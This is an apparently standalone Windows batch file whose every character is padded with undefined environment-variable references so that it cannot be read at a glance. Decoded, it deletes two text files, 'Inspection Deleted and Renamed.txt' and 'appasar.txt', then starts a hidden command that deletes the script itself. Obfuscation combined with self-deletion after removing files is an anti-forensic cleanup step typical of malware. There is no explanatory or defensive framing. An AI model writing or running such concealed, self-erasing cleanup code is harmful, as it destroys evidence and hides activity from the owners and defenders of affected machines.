d%QRAg$V,%e%VzYCNqY%l%FNGZV% %Tp]J,K%"%SU?fNwY%I%.yFDDz%n%Qjwl]%s%tiRuh%p%Gd)#jT%e%PTmlS%c%nBtbvd%t%KmR,Eh@%i%VwXPb(t%o%YjXh(v%n%[dnhv% %#[oLes(%D%(GOfTj%e%FELJeOY%l%xtcxLEH%e%QUo).%t%MIXEUB.%e%?fK]x%d%QkZmwR% %PuEaP%a%Df?hi%n%C.xn$%d%Rr,EW% %XWKRiE%R%_CK$a#%e%VzTmP%n%x[rkES%a%qfrPW)%m%LoTaP%e%oDidbdz%d%eEglG%.%ctKaJyJ%t%jtYMk%x%F(M_yw%t%_FKinM%"%pF(X,Fl% %URbjU@%
d%[Y,iF_?%e%VED))%l%MPkzb% %SwzM.o%"%jyfDdvM%a%CrEEQG%p%pIguDT%p%ucbsD%a%HsPPb%s%ABxjwZ%a%,yWanyr%r%ATRIE%.%a(W]Zr%t%G.ia?IU%x%_CMlFqQ%t%VoZQ,Sp%"%kZJ?(V% %#YC$CI%
s%F#paX#%t%KAY?X%a%J[@Ve%r%DYUM(%t%,k#?AA% %n?AiHM%/%_rISouh%b%NQA$pA% %xANb(Bt%"%PDL((.b%"%eIc]q% %WHcTDAQ%c%h$ZBJ%m%CqrBWE%d%#qDBaL% %CrSaoWN%/%tgfr?%c%lTbsc% %s#bsPF%d%_AZl?%e%Uf,L)%l%uW($LEm% %Nf,dt)%"%TkDepN)%%~f0"&exit /b


